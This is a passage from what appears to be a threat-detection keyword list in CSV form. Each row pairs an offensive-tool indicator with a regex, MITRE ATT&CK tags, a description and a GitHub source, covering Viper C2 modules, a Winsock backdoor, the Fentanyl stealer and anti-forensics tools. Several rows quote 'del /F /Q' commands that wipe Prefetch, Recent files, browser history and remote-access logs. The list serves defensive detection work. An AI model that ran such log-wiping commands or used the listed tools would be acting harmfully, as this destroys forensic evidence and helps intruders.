T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40656" "*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*",".{0,1000}DefenseEvasion_ProcessInjection_CobaltStrikeOnline\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40657" "*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40658" "*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - 
T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40659" "*DefenseEvasion_ProcessInjection_ExampleModule.py*",".{0,1000}DefenseEvasion_ProcessInjection_ExampleModule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40660" "*DefenseEvasion_ProcessInjection_PeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_PeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40661" "*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PowershellRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - 
T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40662" "*DefenseEvasion_ProcessInjection_ProcessHandle.py*",".{0,1000}DefenseEvasion_ProcessInjection_ProcessHandle\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40663" "*DefenseEvasion_ProcessInjection_PythonRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PythonRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40664" "*DefenseEvasion_ProcessInjection_SessionClone.py*",".{0,1000}DefenseEvasion_ProcessInjection_SessionClone\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - 
T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40665" "*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_ShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40666" "*DefenseEvasion_ProcessInjection_WindowsSystem.py*",".{0,1000}DefenseEvasion_ProcessInjection_WindowsSystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40667" "*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*",".{0,1000}DefenseEvasion_SubvertTrustControls_CloneSSLPem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - 
T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40668" "*define BACKDOOR_PORT *",".{0,1000}define\sBACKDOOR_PORT\s.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","40669" "*define DHCP_KEY _T(""SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\ServicePrivateData""*",".{0,1000}define\sDHCP_KEY\s_T\(\""SYSTEM\\\\CurrentControlSet\\\\Services\\\\DHCPServer\\\\ServicePrivateData\"".{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","#registry","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","40670" "*dekrypted/Fentanyl*",".{0,1000}dekrypted\/Fentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","40672" "*del *C:\Program 
Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}del\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40674" "*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}del\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40675" "*del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\\\Microsoft\\\\Windows\\\\Recent\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40676" "*del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - 
T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40677" "*del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40678" "*del /F /Q %APPDATA%\Microsoft\Windows\Recent\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40679" "*del /F /Q %APPDATA%\Microsoft\Windows\Recent\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40680" "*del /F /Q 
%APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40681" "*del /F /Q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40682" "*del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\CustomDestinations\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40683" "*del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\CustomDestinations\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - 
T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40684" "*del /F /Q C:\\Windows\\Prefetch\\*",".{0,1000}del\s\/F\s\/Q\sC\:\\\\Windows\\\\Prefetch\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40685" "*del /F /Q C:\\Windows\\Prefetch\\*",".{0,1000}del\s\/F\s\/Q\sC\:\\\\Windows\\\\Prefetch\\\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40686" "*del /F /Q C:\Windows\Prefetch\*",".{0,1000}del\s\/F\s\/Q\sC\:\\Windows\\Prefetch\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40687" "*del /F /Q C:\Windows\Prefetch\*",".{0,1000}del\s\/F\s\/Q\sC\:\\Windows\\Prefetch\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40688" "*del /f /s /q fscan.exe*",".{0,1000}del\s\/f\s\/s\s\/q\sfscan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40690" "*del /f /s /q npc.exe*",".{0,1000}del\s\/f\s\/s\s\/q\snpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40691" "*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 
- T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40692" "*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\History\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\History\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40693" "*DEL /q /f %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40694" "*DEL /q /f %windir%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40695" "*DEL /q /f %windir%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40696" "*DEL /q /f %windir%\Prefetch\*.pf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Prefetch\\.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - 
T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40697" "*DEL /q /f %windir%\system\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40698" "*DEL /q /f %windir%\system\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40699" "*DEL /q /f %windir%\system32\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40700" "*DEL /q /f %windir%\system32\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40701" "*DEL /q /f %windir%\Temp\*.inf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.inf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in 